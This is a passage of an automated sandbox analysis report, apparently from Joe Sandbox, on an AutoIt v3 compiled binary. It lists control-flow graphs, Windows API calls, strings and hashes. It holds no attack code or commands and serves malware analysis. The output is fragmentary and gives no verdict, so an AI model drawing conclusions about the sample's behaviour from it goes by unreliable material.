527->536 528->515 538 7ff6bb1895f6-7ff6bb189620 528->538 550 7ff6bb1896b5-7ff6bb1896d5 call 7ff6bb1932f4 529->550 551 7ff6bb1896d7-7ff6bb1896dc GetSystemInfo 529->551 530->515 531->515 540 7ff6bb189526-7ff6bb18952f 533->540 541 7ff6bb18951a-7ff6bb189521 533->541 542 7ff6bb18953e-7ff6bb189547 534->542 543 7ff6bb18954c-7ff6bb189554 534->543 535->515 536->515 545 7ff6bb189630-7ff6bb189640 538->545 546 7ff6bb189622-7ff6bb18962b 538->546 547 7ff6bb141f91-7ff6bb141fc0 539->547 540->515 541->515 542->515 548 7ff6bb189564-7ff6bb18956d 543->548 549 7ff6bb189556-7ff6bb18955f 543->549 545->515 546->515 548->515 549->515 553 7ff6bb1896e2-7ff6bb1896ea 550->553 551->553 553->547 555 7ff6bb1896f0-7ff6bb1896f7 FreeLibrary 553->555 555->547
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CurrentInfoSystemVersionWow64
                                                                        • String ID: |O
                                                                        • API String ID: 1568231622-607156228
                                                                        • Opcode ID: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                        • Instruction ID: c666c3da81f1723a498995a25c9d7c631fbbb1b8e63d63a7a84b79682d833e34
                                                                        • Opcode Fuzzy Hash: ec54e35f865d5c9bd0249927ea89c9316792baffd49f7d05aa477cb653b26fcc
                                                                        • Instruction Fuzzy Hash: 34D1A121A1D2D289F6258B1CEA8217A3BA0FF1D788F484036D78DD26B1EF7DB515C741

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 719 7ff6bb1bf630-7ff6bb1bf69e call 7ff6bb146240 722 7ff6bb1bf6a0-7ff6bb1bf6b8 call 7ff6bb12ffbc 719->722 723 7ff6bb1bf6d4-7ff6bb1bf6d9 719->723 732 7ff6bb1bf708-7ff6bb1bf70d 722->732 733 7ff6bb1bf6ba-7ff6bb1bf6d2 call 7ff6bb12ffbc 722->733 724 7ff6bb1bf71e-7ff6bb1bf723 723->724 725 7ff6bb1bf6db-7ff6bb1bf6ef call 7ff6bb12ffbc 723->725 729 7ff6bb1bf725-7ff6bb1bf729 724->729 730 7ff6bb1bf736-7ff6bb1bf75c call 7ff6bb12d4cc call 7ff6bb12e330 724->730 739 7ff6bb1bf6f3-7ff6bb1bf706 call 7ff6bb12ffbc 725->739 731 7ff6bb1bf72d-7ff6bb1bf732 call 7ff6bb12ffbc 729->731 748 7ff6bb1bf840-7ff6bb1bf84a 730->748 749 7ff6bb1bf762-7ff6bb1bf7cf call 7ff6bb12d4cc call 7ff6bb12e330 call 7ff6bb12d4cc call 7ff6bb12e330 call 7ff6bb12d4cc call 7ff6bb12e330 730->749 731->730 740 7ff6bb1bf70f-7ff6bb1bf717 732->740 741 7ff6bb1bf719-7ff6bb1bf71c 732->741 733->739 739->724 739->732 740->731 741->724 741->730 750 7ff6bb1bf87d-7ff6bb1bf8af GetCurrentDirectoryW call 7ff6bb144c68 GetCurrentDirectoryW 748->750 751 7ff6bb1bf84c-7ff6bb1bf86e call 7ff6bb12d4cc call 7ff6bb12e330 748->751 798 7ff6bb1bf7d1-7ff6bb1bf7f3 call 7ff6bb12d4cc call 7ff6bb12e330 749->798 799 7ff6bb1bf806-7ff6bb1bf83e GetSystemDirectoryW call 7ff6bb144c68 GetSystemDirectoryW 749->799 760 7ff6bb1bf8b5-7ff6bb1bf8b8 750->760 751->750 767 7ff6bb1bf870-7ff6bb1bf87b call 7ff6bb148d58 751->767 763 7ff6bb1bf8f0-7ff6bb1bf8ff call 7ff6bb19f464 760->763 764 7ff6bb1bf8ba-7ff6bb1bf8eb call 7ff6bb13f688 * 3 760->764 776 7ff6bb1bf901-7ff6bb1bf903 763->776 777 7ff6bb1bf905-7ff6bb1bf95d call 7ff6bb19fddc call 7ff6bb19fca8 call 7ff6bb19fafc 763->777 764->763 767->750 767->763 781 7ff6bb1bf964-7ff6bb1bf96c 776->781 777->781 809 7ff6bb1bf95f 777->809 783 7ff6bb1bfa0f-7ff6bb1bfa4b CreateProcessW 781->783 784 7ff6bb1bf972-7ff6bb1bfa0d call 7ff6bb18d1f8 call 7ff6bb148d58 * 3 call 7ff6bb144c24 * 3 781->784 788 7ff6bb1bfa4f-7ff6bb1bfa62 call 7ff6bb144c24 * 2 783->788 784->788 811 7ff6bb1bfabe-7ff6bb1bfaca CloseHandle 788->811 812 7ff6bb1bfa64-7ff6bb1bfabc call 7ff6bb124afc * 2 GetLastError call 7ff6bb13f214 call 7ff6bb1313e0 788->812 798->799 825 7ff6bb1bf7f5-7ff6bb1bf800 call 7ff6bb148d58 798->825 799->760 809->781 818 7ff6bb1bfaf5-7ff6bb1bfafc 811->818 819 7ff6bb1bfacc-7ff6bb1bfaf0 call 7ff6bb19f7dc call 7ff6bb1a0088 call 7ff6bb1bfb68 811->819 827 7ff6bb1bfb3b-7ff6bb1bfb65 call 7ff6bb19f51c 812->827 821 7ff6bb1bfafe-7ff6bb1bfb0a 818->821 822 7ff6bb1bfb0c-7ff6bb1bfb35 call 7ff6bb1313e0 CloseHandle 818->822 819->818 821->827 822->827 825->760 825->799
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$Handle$CloseCurrentLockSyncSystem$CreateErrorLastProcess
                                                                        • String ID:
                                                                        • API String ID: 1787492119-0
                                                                        • Opcode ID: 853095626c17b3cf2958649b2832e2098a88d265abeb03c9b668e610f1fcf91b
                                                                        • Instruction ID: 907e6135bedcf067e035a4ee155593d7d5920050e6a4ac8d7db3b579d9d2ecbd
                                                                        • Opcode Fuzzy Hash: 853095626c17b3cf2958649b2832e2098a88d265abeb03c9b668e610f1fcf91b
                                                                        • Instruction Fuzzy Hash: 8BE18B22B08B8186EB14DB2AD5502BE67A1FB89B8CF044536EF5D877B9DF38E445C740
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Init_thread_footer
                                                                        • String ID: Variable must be of type 'Object'.
                                                                        • API String ID: 1385522511-109567571
                                                                        • Opcode ID: eb5ab58aa483e031231d0d2c0750e4448ce7fce129978740ca8f2f10987f0592
                                                                        • Instruction ID: 6967e125d237963e11f772adbce1fd1215011f0d0acf81fb9b8c3e3d2bb2cc1f
                                                                        • Opcode Fuzzy Hash: eb5ab58aa483e031231d0d2c0750e4448ce7fce129978740ca8f2f10987f0592
                                                                        • Instruction Fuzzy Hash: F5C2BE72A08A8286EB64CF19E4942B973A5FB4CB88F544132DB4E977B4DF7DE481C704

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: NameQueryValuewcscat$CloseFileFullModuleOpenPath
                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\Include\
                                                                        • API String ID: 2667193904-1575078665
                                                                        • Opcode ID: f46b7b8725c371db8670322b898ce33d092aa5ab775a87438ab86280a9a7a174
                                                                        • Instruction ID: d06db8689b9776870bfc197ca37679da0903372632a64c5e5020916f6786957e
                                                                        • Opcode Fuzzy Hash: f46b7b8725c371db8670322b898ce33d092aa5ab775a87438ab86280a9a7a174
                                                                        • Instruction Fuzzy Hash: 01913E22A18A9395EB20DF28E9401BD7364FF89788F841136EB4D87AB5DF7CE645C740

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 131 7ff6bb125dec-7ff6bb125e21 133 7ff6bb125e91-7ff6bb125e94 131->133 134 7ff6bb125e23-7ff6bb125e26 131->134 133->134 135 7ff6bb125e96 133->135 136 7ff6bb125e98 134->136 137 7ff6bb125e28-7ff6bb125e2f 134->137 138 7ff6bb125e6b-7ff6bb125e76 DefWindowProcW 135->138 139 7ff6bb16c229-7ff6bb16c261 call 7ff6bb13ede4 call 7ff6bb142c44 136->139 140 7ff6bb125e9e-7ff6bb125ea3 136->140 141 7ff6bb125f21-7ff6bb125f29 PostQuitMessage 137->141 142 7ff6bb125e35-7ff6bb125e3a 137->142 144 7ff6bb125e7c-7ff6bb125e90 138->144 175 7ff6bb16c267-7ff6bb16c26e 139->175 146 7ff6bb125ecc-7ff6bb125efa SetTimer RegisterWindowMessageW 140->146 147 7ff6bb125ea5-7ff6bb125ea8 140->147 145 7ff6bb125ec8-7ff6bb125eca 141->145 148 7ff6bb125e40-7ff6bb125e43 142->148 149 7ff6bb16c2af-7ff6bb16c2c5 call 7ff6bb19a40c 142->149 145->144 146->145 150 7ff6bb125efc-7ff6bb125f09 CreatePopupMenu 146->150 155 7ff6bb16c1b8-7ff6bb16c1bb 147->155 156 7ff6bb125eae-7ff6bb125ebe KillTimer call 7ff6bb125d88 147->156 151 7ff6bb125e49-7ff6bb125e4e 148->151 152 7ff6bb125f2b-7ff6bb125f3a call 7ff6bb144610 148->152 149->145 167 7ff6bb16c2cb 149->167 150->145 157 7ff6bb16c292-7ff6bb16c299 151->157 158 7ff6bb125e54-7ff6bb125e59 151->158 152->145 162 7ff6bb16c1bd-7ff6bb16c1c0 155->162 163 7ff6bb16c1f7-7ff6bb16c224 MoveWindow 155->163 172 7ff6bb125ec3 call 7ff6bb127098 156->172 157->138 173 7ff6bb16c29f-7ff6bb16c2aa call 7ff6bb18c54c 157->173 165 7ff6bb125f0b-7ff6bb125f1f call 7ff6bb125f3c 158->165 166 7ff6bb125e5f-7ff6bb125e65 158->166 170 7ff6bb16c1e4-7ff6bb16c1f2 SetFocus 162->170 171 7ff6bb16c1c2-7ff6bb16c1c5 162->171 163->145 165->145 166->138 166->175 167->138 170->145 171->166 176 7ff6bb16c1cb-7ff6bb16c1df call 7ff6bb13ede4 171->176 172->145 173->138 175->138 180 7ff6bb16c274-7ff6bb16c28d call 7ff6bb125d88 call 7ff6bb126258 175->180 176->145 180->138
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                                        • String ID: TaskbarCreated
                                                                        • API String ID: 129472671-2362178303
                                                                        • Opcode ID: 1235ebd7e81448e07564660c9660bef83c799ad38fc0a315f2003c32225d847e
                                                                        • Instruction ID: 4616a717ff69da04bada27aae736e2f4be2a3a716750ca0f837ca7f1409f206a
                                                                        • Opcode Fuzzy Hash: 1235ebd7e81448e07564660c9660bef83c799ad38fc0a315f2003c32225d847e
                                                                        • Instruction Fuzzy Hash: 6A519131D1C66785F6249B2DF98527AA660FF4EB88F480435DB4EC26B6DE7DF5058300

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                        • String ID: AutoIt v3 GUI$TaskbarCreated
                                                                        • API String ID: 2914291525-2659433951
                                                                        • Opcode ID: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                        • Instruction ID: 34af31342c85d59f27351df81cf7280f61748235093eedade1e810e8103133f2
                                                                        • Opcode Fuzzy Hash: 474949a99bec8184bed6bacf9f27c592b422b8b82249946e56584e62d8b9113a
                                                                        • Instruction Fuzzy Hash: AC311232A08B12CAE700CF65F8853AA37B4FB48759F540139DA4D96B64DF7DA159CB80

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 189 7ff6bb13e958-7ff6bb13e9ae 190 7ff6bb1827e4-7ff6bb1827ea DestroyWindow 189->190 191 7ff6bb13e9b4-7ff6bb13e9d3 mciSendStringW 189->191 195 7ff6bb1827f0-7ff6bb182801 190->195 192 7ff6bb13e9d9-7ff6bb13e9e3 191->192 193 7ff6bb13ecbd-7ff6bb13ecce 191->193 194 7ff6bb13e9e9 192->194 192->195 196 7ff6bb13ecf7-7ff6bb13ed01 193->196 197 7ff6bb13ecd0-7ff6bb13ecf0 UnregisterHotKey 193->197 198 7ff6bb13e9f0-7ff6bb13e9f3 194->198 199 7ff6bb182835-7ff6bb18283f 195->199 200 7ff6bb182803-7ff6bb182806 195->200 196->192 202 7ff6bb13ed07 196->202 197->196 201 7ff6bb13ecf2 call 7ff6bb13f270 197->201 203 7ff6bb13e9f9-7ff6bb13ea08 call 7ff6bb123aa8 198->203 204 7ff6bb13ecb0-7ff6bb13ecb8 call 7ff6bb125410 198->204 199->195 208 7ff6bb182841 199->208 205 7ff6bb182808-7ff6bb182811 call 7ff6bb128314 200->205 206 7ff6bb182813-7ff6bb182817 FindClose 200->206 201->196 202->193 219 7ff6bb13ea0f-7ff6bb13ea12 203->219 204->198 212 7ff6bb18281d-7ff6bb18282e 205->212 206->212 213 7ff6bb182846-7ff6bb18284f call 7ff6bb1b8c00 208->213 212->199 217 7ff6bb182830 call 7ff6bb1a3180 212->217 213->219 217->199 219->213 222 7ff6bb13ea18 219->222 223 7ff6bb13ea1f-7ff6bb13ea22 222->223 224 7ff6bb13ea28-7ff6bb13ea32 223->224 225 7ff6bb182854-7ff6bb18285d call 7ff6bb1946cc 223->225 227 7ff6bb13ea38-7ff6bb13ea42 224->227 228 7ff6bb182862-7ff6bb182873 224->228 225->223 232 7ff6bb18288c-7ff6bb18289d 227->232 233 7ff6bb13ea48-7ff6bb13ea76 call 7ff6bb1313e0 227->233 230 7ff6bb18287b-7ff6bb182885 228->230 231 7ff6bb182875 FreeLibrary 228->231 230->228 234 7ff6bb182887 230->234 231->230 235 7ff6bb1828c9-7ff6bb1828d3 232->235 236 7ff6bb18289f-7ff6bb1828c2 VirtualFree 232->236 242 7ff6bb13ea78 233->242 243 7ff6bb13eabf-7ff6bb13eacc OleUninitialize 233->243 234->232 235->232 238 7ff6bb1828d5 235->238 236->235 239 7ff6bb1828c4 call 7ff6bb1a321c 236->239 245 7ff6bb1828da-7ff6bb1828de 238->245 239->235 244 7ff6bb13ea7d-7ff6bb13eabd call 7ff6bb13f1c4 call 7ff6bb13f13c 242->244 243->245 246 7ff6bb13ead2-7ff6bb13ead9 243->246 244->243 245->246 248 7ff6bb1828e4-7ff6bb1828ef 245->248 249 7ff6bb1828f4-7ff6bb182903 call 7ff6bb1a31d4 246->249 250 7ff6bb13eadf-7ff6bb13eaea 246->250 248->246 261 7ff6bb182905 249->261 253 7ff6bb13ed09-7ff6bb13ed18 call 7ff6bb1442a0 250->253 254 7ff6bb13eaf0-7ff6bb13eb22 call 7ff6bb12a07c call 7ff6bb13f08c call 7ff6bb1239bc 250->254 253->254 265 7ff6bb13ed1e 253->265 273 7ff6bb13eb2e-7ff6bb13ebc4 call 7ff6bb1239bc call 7ff6bb12a07c call 7ff6bb1245c8 * 2 call 7ff6bb12a07c * 3 call 7ff6bb1313e0 call 7ff6bb13ee68 call 7ff6bb13ee2c * 3 254->273 274 7ff6bb13eb24-7ff6bb13eb29 call 7ff6bb144c24 254->274 266 7ff6bb18290a-7ff6bb182919 call 7ff6bb193a78 261->266 265->253 272 7ff6bb18291b 266->272 277 7ff6bb182920-7ff6bb18292f call 7ff6bb13e4e4 272->277 273->266 316 7ff6bb13ebca-7ff6bb13ebdc call 7ff6bb1239bc 273->316 274->273 283 7ff6bb182931 277->283 286 7ff6bb182936-7ff6bb182945 call 7ff6bb1a3078 283->286 292 7ff6bb182947 286->292 295 7ff6bb18294c-7ff6bb18295b call 7ff6bb1a31a8 292->295 302 7ff6bb18295d 295->302 305 7ff6bb182962-7ff6bb182971 call 7ff6bb1a31a8 302->305 310 7ff6bb182973 305->310 310->310 316->277 319 7ff6bb13ebe2-7ff6bb13ebec 316->319 319->286 320 7ff6bb13ebf2-7ff6bb13ec08 call 7ff6bb12a07c 319->320 323 7ff6bb13ed20-7ff6bb13ed25 call 7ff6bb144c24 320->323 324 7ff6bb13ec0e-7ff6bb13ec18 320->324 323->190 325 7ff6bb13ec8a-7ff6bb13eca9 call 7ff6bb12a07c call 7ff6bb144c24 324->325 326 7ff6bb13ec1a-7ff6bb13ec24 324->326 337 7ff6bb13ecab 325->337 326->295 329 7ff6bb13ec2a-7ff6bb13ec3b 326->329 329->305 331 7ff6bb13ec41-7ff6bb13ed71 call 7ff6bb12a07c * 3 call 7ff6bb13ee10 call 7ff6bb13ed8c 329->331 347 7ff6bb13ed77-7ff6bb13ed88 331->347 348 7ff6bb182978-7ff6bb182987 call 7ff6bb1ad794 331->348 337->326 351 7ff6bb182989 348->351 351->351
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: DestroySendStringUninitializeUnregisterWindow
                                                                        • String ID: close all
                                                                        • API String ID: 1992507300-3243417748
                                                                        • Opcode ID: b8b8c68a318977a2f87807421b418c2385e3e6e785d3bf0a97c851cb2b042042
                                                                        • Instruction ID: 331cd933dac5297d7d07b8ca2d4498a1412482692d0e8c857624e455ba6597fe
                                                                        • Opcode Fuzzy Hash: b8b8c68a318977a2f87807421b418c2385e3e6e785d3bf0a97c851cb2b042042
                                                                        • Instruction Fuzzy Hash: 9FE12022B09A46D1EE69DF1AD56027C2360FF89B48F584035DB0E972B1DF3CE866CB54

                                                                        Control-flow Graph

                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                        • String ID: AutoIt v3
                                                                        • API String ID: 423443420-1704141276
                                                                        • Opcode ID: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                        • Instruction ID: 347c9ce1deda3422df5d7fd947207b2f1875080fb6f0a2b712a31e522de76d91
                                                                        • Opcode Fuzzy Hash: b93c51c6ba6201518573a4e6f5cf88ec382112454fc31c9e44e1a0e1eb884e3c
                                                                        • Instruction Fuzzy Hash: 94310336A08B52CEE7408B95F9853AA33B4FB88759F04053ACA8D93B24DF7DD0548744

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 419 7ff6bb167348-7ff6bb1673ba call 7ff6bb167078 422 7ff6bb1673bc-7ff6bb1673c4 call 7ff6bb1555b4 419->422 423 7ff6bb1673d3-7ff6bb1673dd call 7ff6bb15e418 419->423 430 7ff6bb1673c7-7ff6bb1673ce call 7ff6bb1555d4 422->430 428 7ff6bb1673f7-7ff6bb167463 CreateFileW 423->428 429 7ff6bb1673df-7ff6bb1673f5 call 7ff6bb1555b4 call 7ff6bb1555d4 423->429 432 7ff6bb1674eb-7ff6bb1674f6 GetFileType 428->432 433 7ff6bb167469-7ff6bb167470 428->433 429->430 446 7ff6bb16771a-7ff6bb167736 430->446 439 7ff6bb167549-7ff6bb16754f 432->439 440 7ff6bb1674f8-7ff6bb167533 GetLastError call 7ff6bb155564 CloseHandle 432->440 436 7ff6bb1674b8-7ff6bb1674e6 GetLastError call 7ff6bb155564 433->436 437 7ff6bb167472-7ff6bb167476 433->437 436->430 437->436 444 7ff6bb167478-7ff6bb1674b6 CreateFileW 437->444 442 7ff6bb167556-7ff6bb167559 439->442 443 7ff6bb167551-7ff6bb167554 439->443 440->430 453 7ff6bb167539-7ff6bb167544 call 7ff6bb1555d4 440->453 449 7ff6bb16755e-7ff6bb1675ac call 7ff6bb15e334 442->449 450 7ff6bb16755b 442->450 443->449 444->432 444->436 458 7ff6bb1675ae-7ff6bb1675ba call 7ff6bb167284 449->458 459 7ff6bb1675c0-7ff6bb1675ea call 7ff6bb166de4 449->459 450->449 453->430 466 7ff6bb1675bc 458->466 467 7ff6bb1675ef-7ff6bb1675f9 call 7ff6bb1604b8 458->467 464 7ff6bb1675ec 459->464 465 7ff6bb1675fe-7ff6bb167643 459->465 464->467 469 7ff6bb167665-7ff6bb167671 465->469 470 7ff6bb167645-7ff6bb167649 465->470 466->459 467->446 473 7ff6bb167677-7ff6bb16767b 469->473 474 7ff6bb167718 469->474 470->469 472 7ff6bb16764b-7ff6bb167660 470->472 472->469 473->474 475 7ff6bb167681-7ff6bb1676c9 CloseHandle CreateFileW 473->475 474->446 476 7ff6bb1676cb-7ff6bb1676f9 GetLastError call 7ff6bb155564 call 7ff6bb15e548 475->476 477 7ff6bb1676fe-7ff6bb167713 475->477 476->477 477->474
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1692510361.00007FF6BB121000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6BB120000, based on PE: true
                                                                        • Associated: 00000000.00000002.1692492538.00007FF6BB120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1D5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692610417.00007FF6BB1F8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692725660.00007FF6BB20A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1692742807.00007FF6BB214000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_7ff6bb120000_T6l6gPxwQU.jbxd
                                                                        Similarity
                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                        • String ID:
                                                                        • API String ID: 1617910340-0
                                                                        • Opcode ID: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                        • Instruction ID: 797afd90d46972ec7e74d1f28013a1e8addc7957818edd1e9bb1f694c411bf78
                                                                        • Opcode Fuzzy Hash: bd4a1088ede243f3322a3f1c9bbf7769167306ab08ad22946a7c562bc07e9b3d
                                                                        • Instruction Fuzzy Hash: 66C1AE32B28A418AEB54CB68D4413AC3761FB49BACF055235DF2E9B7A9DF38E415C310

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
